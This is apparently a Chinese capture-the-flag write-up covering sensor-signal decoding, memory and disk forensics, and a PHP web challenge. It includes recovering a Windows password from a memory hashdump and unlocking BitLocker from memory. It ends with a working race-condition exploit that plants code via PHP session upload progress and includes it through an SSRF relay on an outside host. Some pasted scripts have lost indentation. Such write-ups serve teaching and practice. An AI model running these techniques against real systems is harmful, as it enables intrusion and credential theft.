乐死人的比赛,没意思
MISC
ChieftainsSecret
jpg附件,直接binwalk,获得图片和csv
电路人狂喜,直接谷歌左边芯片,获得文档以及相关文章
TLE5501 角度传感器开发套件试用:体验TMR技术的进步-说事论飞-知识分享库-英飞凌资料-英飞凌汽车电子生态圈 (infineon-autoeco.com)
extension://oikmahiipjniocckomdccmplodldodja/pdf-viewer/web/viewer.html?file=https%3A%2F%2Fwww.infineon.com%2Fdgdl%2FInfineon-TLE5xxx(D)_Calibration_360_AN-v02_00-AN-v02_00-EN.pdf%3FfileId%3D5546d46264a8de7e0164f09d8bfa228d
csv主要内容:
分别对应sin p sin_n cos_p cos n
主要根据这四个值计算出角度,最后根据图片的电话直接转着对号就行了
此处直接计算PC1-PC0,PC3-PC2,最后求一下ARCTAN就行了
然后直接一个画图
此处中间最高代表按钮按了一次后转圈(老电话),其他就是对应角度,毕竟是个TMR传感器。
以图中蓝线位置为0坐标,根据其进行旋转拨号,获得最终结果:
77085962457,包上flag提交即可
层层取证
套娃题,获得mem跟ftk取证内容
直接ftk挂载即可
e盘是正经windows7磁盘,这里需要对mem进行进一步取证,
vol iehistory发现桌面存在文件
直接ftk找到位置,打开就行了
乐
那就直接新建虚拟机,磁盘选择本地磁盘即可,配置如下,直接一个开机
(类似文章一大堆,随便百度贴)
在VMWare中使用物理硬盘启动虚拟仿真环境-百度经验 (baidu.com)
开机后存在登录,此处绕过方式还挺多的,什么替换SAM表,什么东西
我这直接vol一个hashdump然后cmd5去花钱查询了,哈哈,获得密码:xiaoming_handsome
关键信息便签
进入磁盘管理,发现f盘是个bitlocker加密,那么需要进行解密
使用万能的efdd进行解密即可,把mem导进去就行了
解密后获得一个流量,进行一个流量分析
追踪upd流,看到rar标识符,提示密码是开机密码
word密码是便签上的,打开获得flag
鸣雏恋
简单题,甚至是烂题,
word很大,我忍不了
直接一个解压,进入res,一个key一个压缩包,打开key,经典0宽,获得密钥,解密压缩包
进去一看,好家伙12w个小人图片,一看md5,果然都他妈的一样,磁盘杀手是吧😅
直接写个脚本01转换就完了
import sys
import hashlib
import os.path
flag = []
for i in range(0,129487):
i=bytes(i)
filename = './out/'+i+'.png'
#print(filename)
if os.path.isfile(filename):
fp=open(filename,'rb')
contents=fp.read()
fp.close()
if hashlib.md5(contents).hexdigest()=='a29b9b5c770a188849b787047c7d994d':
flag.append('0')
else:
flag.append('1')
#print(flag)
result = ''.join(flag)
print(result)
然后转字符串即可
乐,复制浏览器
属于是放大一万倍才能看到清
考古
意义不明属于是,mem,可以用vol取证
直接一个cmdscan查看历史操作,经典
找Oneclickcleanup.exe,filescan|grep ‘Oneclickcleanup.exe’即可
导出后丢入ida进行逆向分析,本质是把字符对key进行异或,写脚本还原文件
key = 'this_a_key'
save = ''
data = ['(一堆data,石墨会死,隐藏了)']
for i in range(len(data)):
save += str(hex(data[i] ^ ord(key[i%10])))[2:].zfill(2)
print(save)
提取内容保存为1.docx,查看
这里就不知道干啥了,反正就是乱打乱猜,对着文件进行瞎吉儿异或,获得意外结果,非预期了属于是
shuffle code
傻逼
WEB
安全检测
简单题
import io
import sys
import requests
import threading
sessid = 'Qftm'
def POST(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
'http://eci-2zeip035lxp48jpeew8q.cloudeci1.ichunqiu.com/',
data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php echo 'snowywar';?>"},
files={"file":('q.txt', f)},
cookies={'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.post(url=f'http://eci-2zeip035lxp48jpeew8q.cloudeci1.ichunqiu.com/check2.php',data={'url1':'http://snowywar.top/1.php?url=http://127.0.0.1/admin/include123.php?u=/tmp/sess_{sessid}'})
response = session.get('http://eci-2zefjnsex5f9d0oatqq2.cloudeci1.ichunqiu.com/preview.php')
# print (response.text)
if 'snowywar' not in response.text:
print('[+++]retry')
else:
print(response.text)
sys.exit(0)
user = requests.session()
user.post(url='http://eci-2zeip035lxp48jpeew8q.cloudeci1.ichunqiu.com/login.php',data='{"username":"admin","password":"admin"}')
with user as session:
t1 = threading.Thread(target=POST, args=(session, ))
t1.daemon = True
t1.start()
READ(session)
- 最新
- 最热
只看作者